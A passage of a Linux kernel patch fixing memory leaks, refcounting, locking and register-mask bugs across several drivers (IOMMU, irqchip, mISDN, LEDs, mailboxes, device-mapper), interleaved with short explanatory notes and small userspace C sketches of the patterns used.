+ 	sun50i_table_flush(sun50i_domain, dte_addr, 1);
+ 
+ 	return page_table;
+@@ -601,7 +672,6 @@ static struct iommu_domain *sun50i_iommu_domain_alloc(unsigned type)
+ 	struct sun50i_iommu_domain *sun50i_domain;
+ 
+ 	if (type != IOMMU_DOMAIN_DMA &&
+-	    type != IOMMU_DOMAIN_IDENTITY &&
+ 	    type != IOMMU_DOMAIN_UNMANAGED)
+ 		return NULL;
+ 
+@@ -766,6 +836,7 @@ static const struct iommu_ops sun50i_iommu_ops = {
+ 		.attach_dev	= sun50i_iommu_attach_device,
+ 		.detach_dev	= sun50i_iommu_detach_device,
+ 		.flush_iotlb_all = sun50i_iommu_flush_iotlb_all,
++		.iotlb_sync_map = sun50i_iommu_iotlb_sync_map,
+ 		.iotlb_sync	= sun50i_iommu_iotlb_sync,
+ 		.iova_to_phys	= sun50i_iommu_iova_to_phys,
+ 		.map		= sun50i_iommu_map,
+@@ -785,6 +856,8 @@ static void sun50i_iommu_report_fault(struct sun50i_iommu *iommu,
+ 		report_iommu_fault(iommu->domain, iommu->dev, iova, prot);
+ 	else
+ 		dev_err(iommu->dev, "Page fault while iommu not attached to any domain?\n");
++
++	sun50i_iommu_zap_range(iommu, iova, SPAGE_SIZE);
+ }
+ 
+ static phys_addr_t sun50i_iommu_handle_pt_irq(struct sun50i_iommu *iommu,
+@@ -868,8 +941,8 @@ static phys_addr_t sun50i_iommu_handle_perm_irq(struct sun50i_iommu *iommu)
+ 
+ static irqreturn_t sun50i_iommu_irq(int irq, void *dev_id)
+ {
++	u32 status, l1_status, l2_status, resets;
+ 	struct sun50i_iommu *iommu = dev_id;
+-	u32 status;
+ 
+ 	spin_lock(&iommu->iommu_lock);
+ 
+@@ -879,6 +952,9 @@ static irqreturn_t sun50i_iommu_irq(int irq, void *dev_id)
+ 		return IRQ_NONE;
+ 	}
+ 
++	l1_status = iommu_read(iommu, IOMMU_L1PG_INT_REG);
++	l2_status = iommu_read(iommu, IOMMU_L2PG_INT_REG);
++
+ 	if (status & IOMMU_INT_INVALID_L2PG)
+ 		sun50i_iommu_handle_pt_irq(iommu,
+ 					    IOMMU_INT_ERR_ADDR_L2_REG,
+@@ -892,8 +968,9 @@ static irqreturn_t sun50i_iommu_irq(int irq, void *dev_id)
+ 
+ 	iommu_write(iommu, IOMMU_INT_CLR_REG, status);
+ 
+-	iommu_write(iommu, IOMMU_RESET_REG, ~status);
+-	iommu_write(iommu, IOMMU_RESET_REG, status);
++	resets = (status | l1_status | l2_status) & IOMMU_INT_MASTER_MASK;
++	iommu_write(iommu, IOMMU_RESET_REG, ~resets);
++	iommu_write(iommu, IOMMU_RESET_REG, IOMMU_RESET_RELEASE_ALL);
+ 
+ 	spin_unlock(&iommu->iommu_lock);
+ 
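
The new sun50i zap helpers spin on an invalidate-enable register with readl_poll_timeout_atomic() until the hardware clears it, performing one final read after the deadline. A rough userspace analogue of that bounded-poll idiom, assuming a monotonic clock; poll_reg_clear() and the fake register are invented for the sketch:

#include <stdint.h>
#include <stdio.h>
#include <time.h>

static uint64_t now_us(void)
{
	struct timespec ts;

	clock_gettime(CLOCK_MONOTONIC, &ts);
	return (uint64_t)ts.tv_sec * 1000000 + ts.tv_nsec / 1000;
}

/*
 * Poll *reg until it reads zero or timeout_us elapses; return 0 on
 * success, -1 on timeout. The read after the loop mirrors the kernel
 * helper's final check once the deadline has passed.
 */
static int poll_reg_clear(volatile uint32_t *reg, uint64_t timeout_us)
{
	uint64_t deadline = now_us() + timeout_us;

	do {
		if (*reg == 0)
			return 0;
	} while (now_us() < deadline);

	return *reg == 0 ? 0 : -1;
}

int main(void)
{
	volatile uint32_t fake_reg = 0;	/* pretend the hardware cleared it */

	printf("poll: %d\n", poll_reg_clear(&fake_reg, 2000));
	return 0;
}
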
+diff --git a/drivers/irqchip/irq-gic-pm.c b/drivers/irqchip/irq-gic-pm.c
+index b60e1853593f4..3989d16f997b3 100644
+--- a/drivers/irqchip/irq-gic-pm.c
++++ b/drivers/irqchip/irq-gic-pm.c
+@@ -102,7 +102,7 @@ static int gic_probe(struct platform_device *pdev)
+ 
+ 	pm_runtime_enable(dev);
+ 
+-	ret = pm_runtime_get_sync(dev);
++	ret = pm_runtime_resume_and_get(dev);
+ 	if (ret < 0)
+ 		goto rpm_disable;
+ 
+diff --git a/drivers/irqchip/irq-loongson-liointc.c b/drivers/irqchip/irq-loongson-liointc.c
+index 0da8716f8f24b..c4584e2f0ad3d 100644
+--- a/drivers/irqchip/irq-loongson-liointc.c
++++ b/drivers/irqchip/irq-loongson-liointc.c
+@@ -207,10 +207,13 @@ static int liointc_init(phys_addr_t addr, unsigned long size, int revision,
+ 					"reg-names", core_reg_names[i]);
+ 
+ 			if (index < 0)
+-				goto out_iounmap;
++				continue;
+ 
+ 			priv->core_isr[i] = of_iomap(node, index);
+ 		}
++
++		if (!priv->core_isr[0])
++			goto out_iounmap;
+ 	}
+ 
+ 	/* Setup IRQ domain */
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index c01b9c2570053..03493cda65a37 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -159,6 +159,9 @@ static int pch_pic_domain_translate(struct irq_domain *d,
+ 		return -EINVAL;
+ 
+ 	if (of_node) {
++		if (fwspec->param_count < 2)
++			return -EINVAL;
++
+ 		*hwirq = fwspec->param[0] + priv->ht_vec_base;
+ 		*type = fwspec->param[1] & IRQ_TYPE_SENSE_MASK;
+ 	} else {
+diff --git a/drivers/irqchip/irq-wpcm450-aic.c b/drivers/irqchip/irq-wpcm450-aic.c
+index 0dcbeb1a05a1f..91df62a64cd91 100644
+--- a/drivers/irqchip/irq-wpcm450-aic.c
++++ b/drivers/irqchip/irq-wpcm450-aic.c
+@@ -146,6 +146,7 @@ static int __init wpcm450_aic_of_init(struct device_node *node,
+ 	aic->regs = of_iomap(node, 0);
+ 	if (!aic->regs) {
+ 		pr_err("Failed to map WPCM450 AIC registers\n");
++		kfree(aic);
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/isdn/hardware/mISDN/hfcmulti.c b/drivers/isdn/hardware/mISDN/hfcmulti.c
+index 4f7eaa17fb274..e840609c50eb7 100644
+--- a/drivers/isdn/hardware/mISDN/hfcmulti.c
++++ b/drivers/isdn/hardware/mISDN/hfcmulti.c
+@@ -3217,6 +3217,7 @@ static int
+ hfcm_l1callback(struct dchannel *dch, u_int cmd)
+ {
+ 	struct hfc_multi	*hc = dch->hw;
++	struct sk_buff_head	free_queue;
+ 	u_long	flags;
+ 
+ 	switch (cmd) {
+@@ -3245,6 +3246,7 @@ hfcm_l1callback(struct dchannel *dch, u_int cmd)
+ 		l1_event(dch->l1, HW_POWERUP_IND);
+ 		break;
+ 	case HW_DEACT_REQ:
++		__skb_queue_head_init(&free_queue);
+ 		/* start deactivation */
+ 		spin_lock_irqsave(&hc->lock, flags);
+ 		if (hc->ctype == HFC_TYPE_E1) {
+@@ -3264,20 +3266,21 @@ hfcm_l1callback(struct dchannel *dch, u_int cmd)
+ 				plxsd_checksync(hc, 0);
+ 			}
+ 		}
+-		skb_queue_purge(&dch->squeue);
++		skb_queue_splice_init(&dch->squeue, &free_queue);
+ 		if (dch->tx_skb) {
+-			dev_kfree_skb(dch->tx_skb);
++			__skb_queue_tail(&free_queue, dch->tx_skb);
+ 			dch->tx_skb = NULL;
+ 		}
+ 		dch->tx_idx = 0;
+ 		if (dch->rx_skb) {
+-			dev_kfree_skb(dch->rx_skb);
++			__skb_queue_tail(&free_queue, dch->rx_skb);
+ 			dch->rx_skb = NULL;
+ 		}
+ 		test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+ 		if (test_and_clear_bit(FLG_BUSY_TIMER, &dch->Flags))
+ 			del_timer(&dch->timer);
+ 		spin_unlock_irqrestore(&hc->lock, flags);
++		__skb_queue_purge(&free_queue);
+ 		break;
+ 	case HW_POWERUP_REQ:
+ 		spin_lock_irqsave(&hc->lock, flags);
+@@ -3384,6 +3387,9 @@ handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb)
+ 	case PH_DEACTIVATE_REQ:
+ 		test_and_clear_bit(FLG_L2_ACTIVATED, &dch->Flags);
+ 		if (dch->dev.D.protocol != ISDN_P_TE_S0) {
++			struct sk_buff_head free_queue;
++
++			__skb_queue_head_init(&free_queue);
+ 			spin_lock_irqsave(&hc->lock, flags);
+ 			if (debug & DEBUG_HFCMULTI_MSG)
+ 				printk(KERN_DEBUG
+@@ -3405,14 +3411,14 @@ handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb)
+ 				/* deactivate */
+ 				dch->state = 1;
+ 			}
+-			skb_queue_purge(&dch->squeue);
++			skb_queue_splice_init(&dch->squeue, &free_queue);
+ 			if (dch->tx_skb) {
+-				dev_kfree_skb(dch->tx_skb);
++				__skb_queue_tail(&free_queue, dch->tx_skb);
+ 				dch->tx_skb = NULL;
+ 			}
+ 			dch->tx_idx = 0;
+ 			if (dch->rx_skb) {
+-				dev_kfree_skb(dch->rx_skb);
++				__skb_queue_tail(&free_queue, dch->rx_skb);
+ 				dch->rx_skb = NULL;
+ 			}
+ 			test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+@@ -3424,6 +3430,7 @@ handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb)
+ #endif
+ 			ret = 0;
+ 			spin_unlock_irqrestore(&hc->lock, flags);
++			__skb_queue_purge(&free_queue);
+ 		} else
+ 			ret = l1_event(dch->l1, hh->prim);
+ 		break;
+diff --git a/drivers/isdn/hardware/mISDN/hfcpci.c b/drivers/isdn/hardware/mISDN/hfcpci.c
+index e964a8dd8512a..c0331b2680108 100644
+--- a/drivers/isdn/hardware/mISDN/hfcpci.c
++++ b/drivers/isdn/hardware/mISDN/hfcpci.c
+@@ -1617,16 +1617,19 @@ hfcpci_l2l1D(struct mISDNchannel *ch, struct sk_buff *skb)
+ 		test_and_clear_bit(FLG_L2_ACTIVATED, &dch->Flags);
+ 		spin_lock_irqsave(&hc->lock, flags);
+ 		if (hc->hw.protocol == ISDN_P_NT_S0) {
++			struct sk_buff_head free_queue;
++
++			__skb_queue_head_init(&free_queue);
+ 			/* prepare deactivation */
+ 			Write_hfc(hc, HFCPCI_STATES, 0x40);
+-			skb_queue_purge(&dch->squeue);
++			skb_queue_splice_init(&dch->squeue, &free_queue);
+ 			if (dch->tx_skb) {
+-				dev_kfree_skb(dch->tx_skb);
++				__skb_queue_tail(&free_queue, dch->tx_skb);
+ 				dch->tx_skb = NULL;
+ 			}
+ 			dch->tx_idx = 0;
+ 			if (dch->rx_skb) {
+-				dev_kfree_skb(dch->rx_skb);
++				__skb_queue_tail(&free_queue, dch->rx_skb);
+ 				dch->rx_skb = NULL;
+ 			}
+ 			test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+@@ -1639,10 +1642,12 @@ hfcpci_l2l1D(struct mISDNchannel *ch, struct sk_buff *skb)
+ 			hc->hw.mst_m &= ~HFCPCI_MASTER;
+ 			Write_hfc(hc, HFCPCI_MST_MODE, hc->hw.mst_m);
+ 			ret = 0;
++			spin_unlock_irqrestore(&hc->lock, flags);
++			__skb_queue_purge(&free_queue);
+ 		} else {
+ 			ret = l1_event(dch->l1, hh->prim);
++			spin_unlock_irqrestore(&hc->lock, flags);
+ 		}
+-		spin_unlock_irqrestore(&hc->lock, flags);
+ 		break;
+ 	}
+ 	if (!ret)
+diff --git a/drivers/isdn/hardware/mISDN/hfcsusb.c b/drivers/isdn/hardware/mISDN/hfcsusb.c
+index 651f2f8f685b7..1efd17979f240 100644
+--- a/drivers/isdn/hardware/mISDN/hfcsusb.c
++++ b/drivers/isdn/hardware/mISDN/hfcsusb.c
+@@ -326,20 +326,24 @@ hfcusb_l2l1D(struct mISDNchannel *ch, struct sk_buff *skb)
+ 		test_and_clear_bit(FLG_L2_ACTIVATED, &dch->Flags);
+ 
+ 		if (hw->protocol == ISDN_P_NT_S0) {
++			struct sk_buff_head free_queue;
++
++			__skb_queue_head_init(&free_queue);
+ 			hfcsusb_ph_command(hw, HFC_L1_DEACTIVATE_NT);
+ 			spin_lock_irqsave(&hw->lock, flags);
+-			skb_queue_purge(&dch->squeue);
++			skb_queue_splice_init(&dch->squeue, &free_queue);
+ 			if (dch->tx_skb) {
+-				dev_kfree_skb(dch->tx_skb);
++				__skb_queue_tail(&free_queue, dch->tx_skb);
+ 				dch->tx_skb = NULL;
+ 			}
+ 			dch->tx_idx = 0;
+ 			if (dch->rx_skb) {
+-				dev_kfree_skb(dch->rx_skb);
++				__skb_queue_tail(&free_queue, dch->rx_skb);
+ 				dch->rx_skb = NULL;
+ 			}
+ 			test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+ 			spin_unlock_irqrestore(&hw->lock, flags);
++			__skb_queue_purge(&free_queue);
+ #ifdef FIXME
+ 			if (test_and_clear_bit(FLG_L1_BUSY, &dch->Flags))
+ 				dchannel_sched_event(&hc->dch, D_CLEARBUSY);
+@@ -1330,7 +1334,7 @@ tx_iso_complete(struct urb *urb)
+ 					printk("\n");
+ 				}
+ 
+-				dev_kfree_skb(tx_skb);
++				dev_consume_skb_irq(tx_skb);
+ 				tx_skb = NULL;
+ 				if (fifo->dch && get_next_dframe(fifo->dch))
+ 					tx_skb = fifo->dch->tx_skb;
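
The three mISDN hunks above make the same change: rather than freeing skbs while holding the channel spinlock, they splice the pending queue onto a local list under the lock and purge it only after unlocking. A compact userspace sketch of that splice-under-lock, free-outside pattern, with a pthread mutex and a hand-rolled list standing in for the kernel queue primitives:

#include <pthread.h>
#include <stdlib.h>

struct node {
	struct node *next;
};

struct queue {
	pthread_mutex_t lock;
	struct node *head;
};

/* Move every node off q onto *out; caller must hold q->lock. */
static void splice_init(struct queue *q, struct node **out)
{
	*out = q->head;
	q->head = NULL;
}

static void drain(struct queue *q)
{
	struct node *todo;

	pthread_mutex_lock(&q->lock);
	splice_init(q, &todo);		/* cheap: only pointer moves */
	pthread_mutex_unlock(&q->lock);

	while (todo) {			/* free outside the critical section */
		struct node *n = todo;

		todo = n->next;
		free(n);
	}
}

int main(void)
{
	struct queue q = { PTHREAD_MUTEX_INITIALIZER, NULL };

	for (int i = 0; i < 3; i++) {
		struct node *n = malloc(sizeof(*n));

		if (!n)
			break;
		n->next = q.head;
		q.head = n;
	}
	drain(&q);
	return 0;
}
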
+diff --git a/drivers/leds/leds-is31fl319x.c b/drivers/leds/leds-is31fl319x.c
+index 52b59b62f437c..b2f4c4ec7c567 100644
+--- a/drivers/leds/leds-is31fl319x.c
++++ b/drivers/leds/leds-is31fl319x.c
+@@ -38,6 +38,7 @@
+ #define IS31FL3190_CURRENT_uA_MIN	5000
+ #define IS31FL3190_CURRENT_uA_DEFAULT	42000
+ #define IS31FL3190_CURRENT_uA_MAX	42000
++#define IS31FL3190_CURRENT_SHIFT	2
+ #define IS31FL3190_CURRENT_MASK		GENMASK(4, 2)
+ #define IS31FL3190_CURRENT_5_mA		0x02
+ #define IS31FL3190_CURRENT_10_mA	0x01
+@@ -553,7 +554,7 @@ static int is31fl319x_probe(struct i2c_client *client)
+ 			     is31fl3196_db_to_gain(is31->audio_gain_db));
+ 	else
+ 		regmap_update_bits(is31->regmap, IS31FL3190_CURRENT, IS31FL3190_CURRENT_MASK,
+-				   is31fl3190_microamp_to_cs(dev, aggregated_led_microamp));
++				   is31fl3190_microamp_to_cs(dev, aggregated_led_microamp) << IS31FL3190_CURRENT_SHIFT);
+ 
+ 	for (i = 0; i < is31->cdef->num_leds; i++) {
+ 		struct is31fl319x_led *led = &is31->leds[i];
+diff --git a/drivers/leds/rgb/leds-qcom-lpg.c b/drivers/leds/rgb/leds-qcom-lpg.c
+index 02f51cc618376..c1a56259226fb 100644
+--- a/drivers/leds/rgb/leds-qcom-lpg.c
++++ b/drivers/leds/rgb/leds-qcom-lpg.c
+@@ -602,8 +602,8 @@ static void lpg_brightness_set(struct lpg_led *led, struct led_classdev *cdev,
+ 		lpg_lut_sync(lpg, lut_mask);
+ }
+ 
+-static void lpg_brightness_single_set(struct led_classdev *cdev,
+-				      enum led_brightness value)
++static int lpg_brightness_single_set(struct led_classdev *cdev,
++				     enum led_brightness value)
+ {
+ 	struct lpg_led *led = container_of(cdev, struct lpg_led, cdev);
+ 	struct mc_subled info;
+@@ -614,10 +614,12 @@ static void lpg_brightness_single_set(struct led_classdev *cdev,
+ 	lpg_brightness_set(led, cdev, &info);
+ 
+ 	mutex_unlock(&led->lpg->lock);
++
++	return 0;
+ }
+ 
+-static void lpg_brightness_mc_set(struct led_classdev *cdev,
+-				  enum led_brightness value)
++static int lpg_brightness_mc_set(struct led_classdev *cdev,
++				 enum led_brightness value)
+ {
+ 	struct led_classdev_mc *mc = lcdev_to_mccdev(cdev);
+ 	struct lpg_led *led = container_of(mc, struct lpg_led, mcdev);
+@@ -628,6 +630,8 @@ static void lpg_brightness_mc_set(struct led_classdev *cdev,
+ 	lpg_brightness_set(led, cdev, mc->subled_info);
+ 
+ 	mutex_unlock(&led->lpg->lock);
++
++	return 0;
+ }
+ 
+ static int lpg_blink_set(struct lpg_led *led,
+@@ -1118,7 +1122,7 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 		led->mcdev.num_colors = num_channels;
+ 
+ 		cdev = &led->mcdev.led_cdev;
+-		cdev->brightness_set = lpg_brightness_mc_set;
++		cdev->brightness_set_blocking = lpg_brightness_mc_set;
+ 		cdev->blink_set = lpg_blink_mc_set;
+ 
+ 		/* Register pattern accessors only if we have a LUT block */
+@@ -1132,7 +1136,7 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 			return ret;
+ 
+ 		cdev = &led->cdev;
+-		cdev->brightness_set = lpg_brightness_single_set;
++		cdev->brightness_set_blocking = lpg_brightness_single_set;
+ 		cdev->blink_set = lpg_blink_single_set;
+ 
+ 		/* Register pattern accessors only if we have a LUT block */
+@@ -1151,7 +1155,7 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 	else
+ 		cdev->brightness = LED_OFF;
+ 
+-	cdev->brightness_set(cdev, cdev->brightness);
++	cdev->brightness_set_blocking(cdev, cdev->brightness);
+ 
+ 	init_data.fwnode = of_fwnode_handle(np);
+ 
+diff --git a/drivers/macintosh/macio-adb.c b/drivers/macintosh/macio-adb.c
+index 9b63bd2551c63..cd4e34d15c26b 100644
+--- a/drivers/macintosh/macio-adb.c
++++ b/drivers/macintosh/macio-adb.c
+@@ -108,6 +108,10 @@ int macio_init(void)
+ 		return -ENXIO;
+ 	}
+ 	adb = ioremap(r.start, sizeof(struct adb_regs));
++	if (!adb) {
++		of_node_put(adbs);
++		return -ENOMEM;
++	}
+ 
+ 	out_8(&adb->ctrl.r, 0);
+ 	out_8(&adb->intr.r, 0);
+diff --git a/drivers/macintosh/macio_asic.c b/drivers/macintosh/macio_asic.c
+index 1ec1e5984563f..3bc1f374e6577 100644
+--- a/drivers/macintosh/macio_asic.c
++++ b/drivers/macintosh/macio_asic.c
+@@ -424,7 +424,7 @@ static struct macio_dev * macio_add_one_device(struct macio_chip *chip,
+ 	if (of_device_register(&dev->ofdev) != 0) {
+ 		printk(KERN_DEBUG"macio: device registration error for %s!\n",
+ 		       dev_name(&dev->ofdev.dev));
+-		kfree(dev);
++		put_device(&dev->ofdev.dev);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/mailbox/arm_mhuv2.c b/drivers/mailbox/arm_mhuv2.c
+index a47aef8df52fd..c6d4957c4da83 100644
+--- a/drivers/mailbox/arm_mhuv2.c
++++ b/drivers/mailbox/arm_mhuv2.c
+@@ -1062,8 +1062,8 @@ static int mhuv2_probe(struct amba_device *adev, const struct amba_id *id)
+ 	int ret = -EINVAL;
+ 
+ 	reg = devm_of_iomap(dev, dev->of_node, 0, NULL);
+-	if (!reg)
+-		return -ENOMEM;
++	if (IS_ERR(reg))
++		return PTR_ERR(reg);
+ 
+ 	mhu = devm_kzalloc(dev, sizeof(*mhu), GFP_KERNEL);
+ 	if (!mhu)
+diff --git a/drivers/mailbox/mailbox-mpfs.c b/drivers/mailbox/mailbox-mpfs.c
+index cfacb3f320a64..853901acaeec2 100644
+--- a/drivers/mailbox/mailbox-mpfs.c
++++ b/drivers/mailbox/mailbox-mpfs.c
+@@ -2,7 +2,7 @@
+ /*
+  * Microchip PolarFire SoC (MPFS) system controller/mailbox controller driver
+  *
+- * Copyright (c) 2020 Microchip Corporation. All rights reserved.
++ * Copyright (c) 2020-2022 Microchip Corporation. All rights reserved.
+  *
+  * Author: Conor Dooley <conor.dooley@microchip.com>
+  *
+@@ -56,7 +56,7 @@
+ #define SCB_STATUS_NOTIFY_MASK BIT(SCB_STATUS_NOTIFY)
+ 
+ #define SCB_STATUS_POS (16)
+-#define SCB_STATUS_MASK GENMASK_ULL(SCB_STATUS_POS + SCB_MASK_WIDTH, SCB_STATUS_POS)
++#define SCB_STATUS_MASK GENMASK(SCB_STATUS_POS + SCB_MASK_WIDTH - 1, SCB_STATUS_POS)
+ 
+ struct mpfs_mbox {
+ 	struct mbox_controller controller;
+@@ -130,13 +130,38 @@ static void mpfs_mbox_rx_data(struct mbox_chan *chan)
+ 	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
+ 	struct mpfs_mss_response *response = mbox->response;
+ 	u16 num_words = ALIGN((response->resp_size), (4)) / 4U;
+-	u32 i;
++	u32 i, status;
+ 
+ 	if (!response->resp_msg) {
+ 		dev_err(mbox->dev, "failed to assign memory for response %d\n", -ENOMEM);
+ 		return;
+ 	}
+ 
++	/*
++	 * The status is stored in bits 31:16 of the SERVICES_SR register.
++	 * It is only valid when BUSY == 0.
++	 * We should *never* get an interrupt while the controller is
++	 * still in the busy state. If we do, something has gone badly
++	 * wrong & the content of the mailbox would not be valid.
++	 */
++	if (mpfs_mbox_busy(mbox)) {
++		dev_err(mbox->dev, "got an interrupt but system controller is busy\n");
++		response->resp_status = 0xDEAD;
++		return;
++	}
++
++	status = readl_relaxed(mbox->ctrl_base + SERVICES_SR_OFFSET);
++
++	/*
++	 * If the status of the individual service is non-zero, the service has
++	 * failed. The contents of the mailbox at this point are not valid,
++	 * so don't bother reading them. Set the status so that the driver
++	 * implementing the service can handle the result.
++	 */
++	response->resp_status = (status & SCB_STATUS_MASK) >> SCB_STATUS_POS;
++	if (response->resp_status)
++		return;
++
+ 	if (!mpfs_mbox_busy(mbox)) {
+ 		for (i = 0; i < num_words; i++) {
+ 			response->resp_msg[i] =
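
The SCB_STATUS_MASK fix above corrects an off-by-one: GENMASK(h, l) covers bits h..l inclusive, so a field SCB_MASK_WIDTH bits wide starting at SCB_STATUS_POS ends at SCB_STATUS_POS + SCB_MASK_WIDTH - 1. A standalone demonstration, using a local 32-bit re-implementation of the macro rather than the kernel's include/linux/bits.h version:

#include <stdint.h>
#include <stdio.h>

/* 32-bit re-implementation of GENMASK(h, l): bits h..l inclusive. */
#define GENMASK(h, l) \
	(((~0u) - (1u << (l)) + 1) & (~0u >> (31 - (h))))

#define POS	16
#define WIDTH	16

int main(void)
{
	/*
	 * The buggy form, GENMASK(POS + WIDTH, POS), would span 17 bits
	 * and reach bit 32 — out of range for a 32-bit register.
	 */
	uint32_t good = GENMASK(POS + WIDTH - 1, POS);

	printf("mask = 0x%08x\n", good);	/* 0xffff0000 */
	return 0;
}
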
+diff --git a/drivers/mailbox/pcc.c b/drivers/mailbox/pcc.c
+index 3c2bc0ca454cf..105d46c9801ba 100644
+--- a/drivers/mailbox/pcc.c
++++ b/drivers/mailbox/pcc.c
+@@ -743,6 +743,7 @@ static int __init pcc_init(void)
+ 
+ 	if (IS_ERR(pcc_pdev)) {
+ 		pr_debug("Err creating PCC platform bundle\n");
++		pcc_chan_count = 0;
+ 		return PTR_ERR(pcc_pdev);
+ 	}
+ 
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index 31a0fa9142744..12e004ff1a147 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -493,6 +493,7 @@ static int zynqmp_ipi_mbox_probe(struct zynqmp_ipi_mbox *ipi_mbox,
+ 	ret = device_register(&ipi_mbox->dev);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register ipi mbox dev.\n");
++		put_device(&ipi_mbox->dev);
+ 		return ret;
+ 	}
+ 	mdev = &ipi_mbox->dev;
+@@ -619,7 +620,8 @@ static void zynqmp_ipi_free_mboxes(struct zynqmp_ipi_pdata *pdata)
+ 		ipi_mbox = &pdata->ipi_mboxes[i];
+ 		if (ipi_mbox->dev.parent) {
+ 			mbox_controller_unregister(&ipi_mbox->mbox);
+-			device_unregister(&ipi_mbox->dev);
++			if (device_is_registered(&ipi_mbox->dev))
++				device_unregister(&ipi_mbox->dev);
+ 		}
+ 	}
+ }
+diff --git a/drivers/mcb/mcb-core.c b/drivers/mcb/mcb-core.c
+index 338fc889b357a..b8ad4f16b4acd 100644
+--- a/drivers/mcb/mcb-core.c
++++ b/drivers/mcb/mcb-core.c
+@@ -71,8 +71,10 @@ static int mcb_probe(struct device *dev)
+ 
+ 	get_device(dev);
+ 	ret = mdrv->probe(mdev, found_id);
+-	if (ret)
++	if (ret) {
+ 		module_put(carrier_mod);
++		put_device(dev);
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index 0266bfddfbe27..aa6938da0db85 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -108,7 +108,7 @@ static int chameleon_parse_gdd(struct mcb_bus *bus,
+ 	return 0;
+ 
+ err:
+-	mcb_free_dev(mdev);
++	put_device(&mdev->dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 95a1ee3d314eb..e30c2d2bc9c78 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -732,28 +732,48 @@ static char *_dm_claim_ptr = "I belong to device-mapper";
+ /*
+  * Open a table device so we can use it as a map destination.
+  */
+-static int open_table_device(struct table_device *td, dev_t dev,
+-			     struct mapped_device *md)
++static struct table_device *open_table_device(struct mapped_device *md,
++		dev_t dev, fmode_t mode)
+ {
++	struct table_device *td;
+ 	struct block_device *bdev;
+ 	u64 part_off;
+ 	int r;
+ 
+-	BUG_ON(td->dm_dev.bdev);
++	td = kmalloc_node(sizeof(*td), GFP_KERNEL, md->numa_node_id);
++	if (!td)
++		return ERR_PTR(-ENOMEM);
++	refcount_set(&td->count, 1);
+ 
+-	bdev = blkdev_get_by_dev(dev, td->dm_dev.mode | FMODE_EXCL, _dm_claim_ptr);
+-	if (IS_ERR(bdev))
+-		return PTR_ERR(bdev);
++	bdev = blkdev_get_by_dev(dev, mode | FMODE_EXCL, _dm_claim_ptr);
++	if (IS_ERR(bdev)) {
++		r = PTR_ERR(bdev);
++		goto out_free_td;
++	}
+ 
+-	r = bd_link_disk_holder(bdev, dm_disk(md));
+-	if (r) {
+-		blkdev_put(bdev, td->dm_dev.mode | FMODE_EXCL);
+-		return r;
++	/*
++	 * We can be called before the dm disk is added.  In that case we can't
++	 * register the holder relation here.  It will be done once add_disk
++	 * has been called.
++	 */
++	if (md->disk->slave_dir) {
++		r = bd_link_disk_holder(bdev, md->disk);
++		if (r)
++			goto out_blkdev_put;
+ 	}
+ 
++	td->dm_dev.mode = mode;
+ 	td->dm_dev.bdev = bdev;
+ 	td->dm_dev.dax_dev = fs_dax_get_by_bdev(bdev, &part_off, NULL, NULL);
+-	return 0;
++	format_dev_t(td->dm_dev.name, dev);
++	list_add(&td->list, &md->table_devices);
++	return td;
++
++out_blkdev_put:
++	blkdev_put(bdev, mode | FMODE_EXCL);
++out_free_td:
++	kfree(td);
++	return ERR_PTR(r);
+ }
+ 
+ /*
+@@ -761,14 +781,12 @@ static int open_table_device(struct table_device *td, dev_t dev,
+  */
+ static void close_table_device(struct table_device *td, struct mapped_device *md)
+ {
+-	if (!td->dm_dev.bdev)
+-		return;
+-
+-	bd_unlink_disk_holder(td->dm_dev.bdev, dm_disk(md));
++	if (md->disk->slave_dir)
++		bd_unlink_disk_holder(td->dm_dev.bdev, md->disk);
+ 	blkdev_put(td->dm_dev.bdev, td->dm_dev.mode | FMODE_EXCL);
+ 	put_dax(td->dm_dev.dax_dev);
+-	td->dm_dev.bdev = NULL;
+-	td->dm_dev.dax_dev = NULL;
++	list_del(&td->list);
++	kfree(td);
+ }
+ 
+ static struct table_device *find_table_device(struct list_head *l, dev_t dev,
+@@ -786,31 +804,16 @@ static struct table_device *find_table_device(struct list_head *l, dev_t dev,
+ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ 			struct dm_dev **result)
+ {
+-	int r;
+ 	struct table_device *td;
+ 
+ 	mutex_lock(&md->table_devices_lock);
+ 	td = find_table_device(&md->table_devices, dev, mode);
+ 	if (!td) {
+-		td = kmalloc_node(sizeof(*td), GFP_KERNEL, md->numa_node_id);
+-		if (!td) {
++		td = open_table_device(md, dev, mode);
++		if (IS_ERR(td)) {
+ 			mutex_unlock(&md->table_devices_lock);
+-			return -ENOMEM;
++			return PTR_ERR(td);
+ 		}
+-
+-		td->dm_dev.mode = mode;
+-		td->dm_dev.bdev = NULL;
+-
+-		if ((r = open_table_device(td, dev, md))) {
+-			mutex_unlock(&md->table_devices_lock);
+-			kfree(td);
+-			return r;
+-		}
+-
+-		format_dev_t(td->dm_dev.name, dev);
+-
+-		refcount_set(&td->count, 1);
